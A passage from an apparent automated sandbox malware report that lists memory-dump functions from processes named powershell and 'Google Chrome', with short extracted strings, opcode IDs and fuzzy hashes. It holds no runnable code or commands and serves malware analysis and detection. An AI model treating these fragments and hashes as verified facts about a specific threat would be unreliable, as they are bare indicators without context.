                                                    Function 00007FFAAB7A33B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2360933341.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab7a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction ID: 33f1b81c8c27d8acaf9391e985c2241267c4e698fd96d36945835ac19d5c6327
                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction Fuzzy Hash: AD01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                    Function 00007FFAAB87414D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2364138689.00007FFAAB870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab870000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9072e142c3f8373779e9db9e57f3e2c1bb36f818a6d3d697b6b563cdeb51b0f6
                                                    • Instruction ID: 08e9a881d05302f0562af48c8109eca538c689c768b229b5e5b29134bce5931d
                                                    • Opcode Fuzzy Hash: 9072e142c3f8373779e9db9e57f3e2c1bb36f818a6d3d697b6b563cdeb51b0f6
                                                    • Instruction Fuzzy Hash: DDF0BE32A1D5448FD768EB5CE4828E873E0EF5A36471540FAE05DC75B3CA25EC84C790
                                                    Function 00007FFAAB874400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2364138689.00007FFAAB870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab870000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9051b7d36460f8c83f4b6ab74ad3b85c8e1ebf4c54e7df89e555ea70f2687ce3
                                                    • Instruction ID: a08a479a6c192a3e8ba6c63045f918543a0c1c7fbb6586ada0fecb83a4d8b134
                                                    • Opcode Fuzzy Hash: 9051b7d36460f8c83f4b6ab74ad3b85c8e1ebf4c54e7df89e555ea70f2687ce3
                                                    • Instruction Fuzzy Hash: 07F0BE32A0E5448FD754EB1CE4518A877E0FF0A36471540F6E05DC70B3CA25AC84C780
                                                    Function 00007FFAAB8741D1 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2364138689.00007FFAAB870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab870000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: 320d7c5a46c2b1d898a7c3aa3522f74a95da230ffa89ecdd515350aba1bafc3f
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: D3E0E531B1C808CF9A68EB0CE0819A973E5EB9937571541A6D14EC7561CA22FC958B90

                                                    Executed Functions

                                                    Function 00007FFAAB7A16E9 Relevance: 10.7, Strings: 8, Instructions: 699COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$6g$6g$6g$"rg$0Dq$8Mq$U
                                                    • API String ID: 0-574773328
                                                    • Opcode ID: ca10fc54cd5c06d4441f853f73cc53be321ff90c4898c0ed2e3765c6019e6a52
                                                    • Instruction ID: 5621993e315e350d4657d062497ea70cb22d3dd221de789575170d485ae54135
                                                    • Opcode Fuzzy Hash: ca10fc54cd5c06d4441f853f73cc53be321ff90c4898c0ed2e3765c6019e6a52
                                                    • Instruction Fuzzy Hash: 8222D871B19A499FE798EB3CC45967977E2FF99340F44497DE00EC36E2CE68A8018781
                                                    Function 00007FFAAB7A20C1 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A$r6g
                                                    • API String ID: 0-4080485727
                                                    • Opcode ID: fa1eefbdfc733019afdc62d028a1f8d6febe37c970a992d28826f860b5edafbf
                                                    • Instruction ID: 2776e2d1c54b150e8032f2b8c4fc8c7c27ca1f83964164c182b3ea7ef5ce4b13
                                                    • Opcode Fuzzy Hash: fa1eefbdfc733019afdc62d028a1f8d6febe37c970a992d28826f860b5edafbf
                                                    • Instruction Fuzzy Hash: 4E510351A1E6C94FD796AB7898646B6BFE5EF87215B0804FFE0CDC71A3DD580806C382
                                                    Function 00007FFAAB7A0E5E Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A
                                                    • API String ID: 0-3554254475
                                                    • Opcode ID: ca58a55bd6126726383d65342b838f59ae9446b1a7f5eddeac25b0a4340f5f7b
                                                    • Instruction ID: 3040dc4b0581fd0715d6085c9e8fa777dc5b424b77d6c2c4a6a068cdb9b1bb1e
                                                    • Opcode Fuzzy Hash: ca58a55bd6126726383d65342b838f59ae9446b1a7f5eddeac25b0a4340f5f7b
                                                    • Instruction Fuzzy Hash: DE715953A0D6965EE366B73CE8199F93B95DF87230B0985FBD0CDCB5A3DC0828468391
                                                    Function 00007FFAAB7A0AFA Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: c3219f1a0ffa5493a76e9b1ab57c00916327417e903e7bbc9523b51d040a5d8b
                                                    • Instruction ID: 42a1c448eb56b2f92d67030e64c44585b8b383ea3437ebb4bc9bc7922f9f1dd3
                                                    • Opcode Fuzzy Hash: c3219f1a0ffa5493a76e9b1ab57c00916327417e903e7bbc9523b51d040a5d8b
                                                    • Instruction Fuzzy Hash: 7251F173A0A51ACFDB54BB7CE8459FC73B1EF85325F048ABAD00D872D2CE2864458780
                                                    Function 00007FFAAB7A0B6F Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: 0ccff9dfd308529d1732b07b1741599040a03b6bcef5d32e76b51bc7a5c4bbb7
                                                    • Instruction ID: 56ba8b35c209bcb8409b6ab24b792d6eabf10cbf76b6eebe3146d1403c4ea965
                                                    • Opcode Fuzzy Hash: 0ccff9dfd308529d1732b07b1741599040a03b6bcef5d32e76b51bc7a5c4bbb7
                                                    • Instruction Fuzzy Hash: 3941F076A0991E8FDB44EB78D851AEC77A1FF88311F4446BAD009C72D2CE38A4468780
                                                    Function 00007FFAAB7A07F2 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ;M_$<M_^
                                                    • API String ID: 0-3421805066
                                                    • Opcode ID: adb017272fe3a098a6ffd326a49ee857439d5e0d90a4cef5b0485cb69b1b0ec6
                                                    • Instruction ID: bc92c96f8c51a045edaa2429317f9d95f7d9aa81fdb4422e741eedebc6587e13
                                                    • Opcode Fuzzy Hash: adb017272fe3a098a6ffd326a49ee857439d5e0d90a4cef5b0485cb69b1b0ec6
                                                    • Instruction Fuzzy Hash: 0D513577A096599FD354EB7CE8958E93BA0EF80214B4489FAD04C8B7D3DE2C34099B91
                                                    Function 00007FFAAB7A11F2 Relevance: 1.8, Strings: 1, Instructions: 579COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2M_^
                                                    • API String ID: 0-3000290509
                                                    • Opcode ID: bfdc42e41ca150fa52143149c169d5d02899c6d57a6ba7bd81fd3145e54b8670
                                                    • Instruction ID: c8cbe2fc372ac8f8c3e97408d6e3ec85deb49ccec9168912f3330da86f043db8
                                                    • Opcode Fuzzy Hash: bfdc42e41ca150fa52143149c169d5d02899c6d57a6ba7bd81fd3145e54b8670
                                                    • Instruction Fuzzy Hash: D1512663E0A69A9EE751A77CEC654FD7F70EF43260B0946FBC08DDA4A3CD1824098791
                                                    Function 00007FFAAB7A11F0 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2M_^
                                                    • API String ID: 0-3000290509
                                                    • Opcode ID: 82556b8a444c84c35fc82580f3c63197aa52dd49876abb7aa67b9f41508617fb
                                                    • Instruction ID: 310fc5221c6f1dfae952c06d570939102278b6f49f461f26a3a2c8eb191211e6
                                                    • Opcode Fuzzy Hash: 82556b8a444c84c35fc82580f3c63197aa52dd49876abb7aa67b9f41508617fb
                                                    • Instruction Fuzzy Hash: 01511663D0A69A9EE751A77CEC654FD7F70EF43264B0986FBC08DDA4A3CC1824098391
                                                    Function 00007FFAAB7A0638 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6g
                                                    • API String ID: 0-2482269165
                                                    • Opcode ID: 7189670cb4f88fad945bf7382e20f8af76f3ed9257fdd0b5132132bea154c010
                                                    • Instruction ID: 38ea52a795d17da192e67b3d863891b48d147dc0482533649b2f37f97ee51fb2
                                                    • Opcode Fuzzy Hash: 7189670cb4f88fad945bf7382e20f8af76f3ed9257fdd0b5132132bea154c010
                                                    • Instruction Fuzzy Hash: E531E661B1C9094FE698EB2CD469679B6D6FF99310F0405BEE00EC33A3DD689C018381
                                                    Function 00007FFAAB7A2291 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8eq
                                                    • API String ID: 0-356513418
                                                    • Opcode ID: ff226a01e549361b41ba4f0e17df172a31fc5964fd92865790371e2577abb92a
                                                    • Instruction ID: c45bd5ad6942374d619594e5f742c61837b871f47138a224aa6cd17354f99192
                                                    • Opcode Fuzzy Hash: ff226a01e549361b41ba4f0e17df172a31fc5964fd92865790371e2577abb92a
                                                    • Instruction Fuzzy Hash: D601421580FB818FE3D1A33858654313FF0CB962A1B0944BFE88CC60F3D8886E4883D2
                                                    Function 00007FFAAB7A12B8 Relevance: .5, Instructions: 485COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03b1d735ae0a801e38fef96ebf8a9857e13662906d8ed0f60b9efb59c75ee86e
                                                    • Instruction ID: 4d9d6d93c3ad63b20a143ff140ae5c6a7e095ea2d513952906c4e6d63d078e9a
                                                    • Opcode Fuzzy Hash: 03b1d735ae0a801e38fef96ebf8a9857e13662906d8ed0f60b9efb59c75ee86e
                                                    • Instruction Fuzzy Hash: D5310862D0AA4E8FE790D768C8651FCBFB1EF46240F4946FBC00DE71E6CD6818098791
                                                    Function 00007FFAAB7A0D48 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
                                                    • Instruction ID: 066d5cf18f932706d4f24142d9ebb86ba15a3628c1a94be8c741039da6bc7d4e
                                                    • Opcode Fuzzy Hash: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
                                                    • Instruction Fuzzy Hash: 28218152B1590A8FFB94BBBCD80A7FC72D6EF98751F10457AE00DC3292DD28A8014381
                                                    Function 00007FFAAB7A086D Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.1903093092.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6be894be8a04120a9df4fa739fb1ed2e62c47369e0762853e3fa29a15d50c62f
                                                    • Instruction ID: e20f5760b383116165f70237c9faef5927bbc7234b76a01530aab026db0a4a2b
                                                    • Opcode Fuzzy Hash: 6be894be8a04120a9df4fa739fb1ed2e62c47369e0762853e3fa29a15d50c62f
                                                    • Instruction Fuzzy Hash: 4821E2B6658A495FC790EB28C4909AD7F72FF88240F8488E4D409CB7CBCE3C6904D751

                                                    Executed Functions

                                                    Function 00007FFAAB7B16E9 Relevance: 10.7, Strings: 8, Instructions: 697COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$6g$6g$6g$"rg$0Dq$8Mq$U
                                                    • API String ID: 0-574773328
                                                    • Opcode ID: 01895c42105374b7181bf5c0023ad68d31cf432fc5aa9d5a153c5a8f30174987
                                                    • Instruction ID: 0d151cec20ccc241f92073453d1d62961271b4ff950e7987e8313cf230e6bb11
                                                    • Opcode Fuzzy Hash: 01895c42105374b7181bf5c0023ad68d31cf432fc5aa9d5a153c5a8f30174987
                                                    • Instruction Fuzzy Hash: C922E971B29A498FE758EB3CC4596BD77E2FF99340F408579D44EC36E2DE28A8018781
                                                    Function 00007FFAAB7B20C1 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A$r6g
                                                    • API String ID: 0-4080485727
                                                    • Opcode ID: 20a13756aae3efacdb014cb2f591984d890c0d7504fd4105380a9fd5900d4119
                                                    • Instruction ID: a651770b2d34255169412f3d0f48b94eefac1bb2f63de97936f107706bbdddaa
                                                    • Opcode Fuzzy Hash: 20a13756aae3efacdb014cb2f591984d890c0d7504fd4105380a9fd5900d4119
                                                    • Instruction Fuzzy Hash: D5512351A1F6C98FD796AB3898646B5BFE5EF87215B0804FBE0CDC71A3DD584806C382
                                                    Function 00007FFAAB7B0E5E Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A
                                                    • API String ID: 0-3554254475
                                                    • Opcode ID: 2484453ea445cff778d5b3be2ec679657c089c1aab97685e8451758980ecf86d
                                                    • Instruction ID: 6ac71303a36cabe355d085f9793de1b64c0c4be94e32caffdc7065256f733273
                                                    • Opcode Fuzzy Hash: 2484453ea445cff778d5b3be2ec679657c089c1aab97685e8451758980ecf86d
                                                    • Instruction Fuzzy Hash: 19714A53A0D6965EE326B77CE8199F93B95DF86230B0980FBD0CDCA5A3DC0828478391
                                                    Function 00007FFAAB7B0AFB Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: e1b9e38f2e428db98bf2f91d04796c1d0010148f5e8161f25720e3ce0127f34c
                                                    • Instruction ID: c696bc30a6e1a9a17b3abfaf51a0b2123bb8e015a1849ddbf6d5a0987c335656
                                                    • Opcode Fuzzy Hash: e1b9e38f2e428db98bf2f91d04796c1d0010148f5e8161f25720e3ce0127f34c
                                                    • Instruction Fuzzy Hash: 9D51D073A0991ADBDB14BBBCE8455FD73B1EF85361B04857AD00AC72A2CE2974468BC0
                                                    Function 00007FFAAB7B0B6F Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: 9200f74f871b031212241e79c0020c345407555025df60dbb3eb486ff071a9d8
                                                    • Instruction ID: 2a13bd9fe57c9ede046d726aad5cae747bd7af49c48b702fff831572e9b8d093
                                                    • Opcode Fuzzy Hash: 9200f74f871b031212241e79c0020c345407555025df60dbb3eb486ff071a9d8
                                                    • Instruction Fuzzy Hash: 1241DE76A04A1E9FDB44EBBCD851AFD73A1FF89311F40857AD009D7292DE35A446CB80
                                                    Function 00007FFAAB7B07F2 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ;L_$<L_^
                                                    • API String ID: 0-636787459
                                                    • Opcode ID: 1acc205d5051a69105e25490d244375762fedf343d0d150e570c1f770ef0192e
                                                    • Instruction ID: 4b4a8387edb2274986b31c4846d780e84189ff3c934c9936103325af8a0951fb
                                                    • Opcode Fuzzy Hash: 1acc205d5051a69105e25490d244375762fedf343d0d150e570c1f770ef0192e
                                                    • Instruction Fuzzy Hash: 155134B7A09A5D9FD314E76CE8958ED3BB0EF84314740C4F6D189CB7A2DD2868068B81
                                                    Function 00007FFAAB7B11F2 Relevance: 1.8, Strings: 1, Instructions: 578COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2L_^
                                                    • API String ID: 0-3004606202
                                                    • Opcode ID: 2f49eb5b77470e203c6598f7ec8952c3837931c5c30ad6a03923aadfce8f299b
                                                    • Instruction ID: 0f96e8101041a400d59220821a0912bae8b250bf26e543422e431063a0bcbdd9
                                                    • Opcode Fuzzy Hash: 2f49eb5b77470e203c6598f7ec8952c3837931c5c30ad6a03923aadfce8f299b
                                                    • Instruction Fuzzy Hash: 82510663E0A696DED711A7BCE8664FD7F70EF43264B0985F6C08DDA4A3DC14280A87D1
                                                    Function 00007FFAAB7B11F0 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2L_^
                                                    • API String ID: 0-3004606202
                                                    • Opcode ID: 089beab621f9e166a923f9cd197c1320d83039d0483d8b15cb24afe3dbb1af55
                                                    • Instruction ID: 28c764132821976629ff89cdc4b4349777aa5da6a2e1797048f922b30bfb336c
                                                    • Opcode Fuzzy Hash: 089beab621f9e166a923f9cd197c1320d83039d0483d8b15cb24afe3dbb1af55
                                                    • Instruction Fuzzy Hash: 16511463E0A696DED711A7BCE8564ED7F70EF42264B0985F6C08EDA4A3CC18280987D1
                                                    Function 00007FFAAB7B0638 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6g
                                                    • API String ID: 0-2482269165
                                                    • Opcode ID: 854214f5cbd694ede50badece7b73d2553b0edc23fd3ad83d79a15ef54f9e71f
                                                    • Instruction ID: 50b256207be60e33f86c1483b09584ad273ffad11ea0061796bec960e32a838d
                                                    • Opcode Fuzzy Hash: 854214f5cbd694ede50badece7b73d2553b0edc23fd3ad83d79a15ef54f9e71f
                                                    • Instruction Fuzzy Hash: CE31D561B199094FE698EB2CD469679BAD6EB99314F0445BAE04EC32A3DD649C028380
                                                    Function 00007FFAAB7B2291 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8eq
                                                    • API String ID: 0-356513418
                                                    • Opcode ID: 2ab9616983ae27abccc95c274baf9a9392e21216af8eecf0bfe24a671f4f04c6
                                                    • Instruction ID: f1535fa6c5ec958a291ec1a374d3eefdc587586344d0367b0db4fad4fbcb82c8
                                                    • Opcode Fuzzy Hash: 2ab9616983ae27abccc95c274baf9a9392e21216af8eecf0bfe24a671f4f04c6
                                                    • Instruction Fuzzy Hash: BC01421180FB858FE391A33C58554B13FF0CB972A1B0944BBE88DC60B3D888AE4887C2
                                                    Function 00007FFAAB7B12B8 Relevance: .5, Instructions: 485COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1d06724ad91f5ee74e2d6bb1ccedfabe9cbcf7db6e2462fba565b530ac8b542
                                                    • Instruction ID: eca983c85f31dee5a3070d2a635fcbfc45e684b5a9337160e703975bec3e01f3
                                                    • Opcode Fuzzy Hash: d1d06724ad91f5ee74e2d6bb1ccedfabe9cbcf7db6e2462fba565b530ac8b542
                                                    • Instruction Fuzzy Hash: 4631F572E1AA8ACFDB50DB68D8651FC7FB1FF46240F4541BAC00EE71B6CD6428098B91
                                                    Function 00007FFAAB7B0D48 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5aa8c69adcf3a91edd0d414085a76b56429874fd5d3807d72c178753b48059a
                                                    • Instruction ID: 5fcb5fa5bce5f27ec977383a8da10fd4d58f5daba7a31d3df353410fe18792f5
                                                    • Opcode Fuzzy Hash: b5aa8c69adcf3a91edd0d414085a76b56429874fd5d3807d72c178753b48059a
                                                    • Instruction Fuzzy Hash: CC218151B1490A8BFB94BBBCD80A7FC62D6EF98751F10817AE00EC32D2DD28A8014791
                                                    Function 00007FFAAB7B086D Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
